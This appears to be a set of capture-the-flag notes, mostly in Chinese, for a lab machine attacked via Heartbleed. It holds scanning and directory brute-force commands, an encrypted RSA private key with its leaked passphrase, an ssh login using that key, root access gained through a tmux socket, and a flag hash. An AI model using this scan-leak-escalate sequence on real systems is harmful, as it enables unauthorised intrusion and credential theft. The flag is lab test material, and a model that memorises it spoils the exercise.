nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.3.150 (扫描TCP)

nmap -sU --top-ports 100 10.129.3.150 (扫描UDP)

gobuster dir -u https://10.129.3.150/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html -k

http://10.129.3.150/dev/

http://10.129.3.150/dev/hype_key

https://www.convertstring.com/EncodeDecode/HexDecode#google_vignette

-----BEGIN RSA PRIVATE KEY-----

Proc-Type: 4,ENCRYPTED

DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46

DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R

5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6

0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi

Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P

OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd

pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH

QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E

p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC

Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO

t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5

XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK

aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ

+wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E

AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc

https://10.129.3.150/decode.php

https://10.129.3.150/encode.php

心跳滴血

nmap --script=ssl-heartbleed -p 443 10.129.3.150

searchsploit heartbleed

使用heartbleed获取密码

经过解码获取明文信息
明文：heartbleedbelievethehype 

 强制客户端使用 ssh-rsa

ssh -o PubkeyAcceptedKeyTypes=+ssh-rsa -i rsa hype@10.129.235.13

Tmux 是一个终端复用器（terminal multiplexer），非常有用，属于常用的开发工具。

最终发现执行历史命令中的 tmux -S /.devs/dev_sess 即可进行提权操作

/usr/bin/tmux -S /.devs/dev_sess

c3122f8dfb822a6a3b192ec4c5ef3577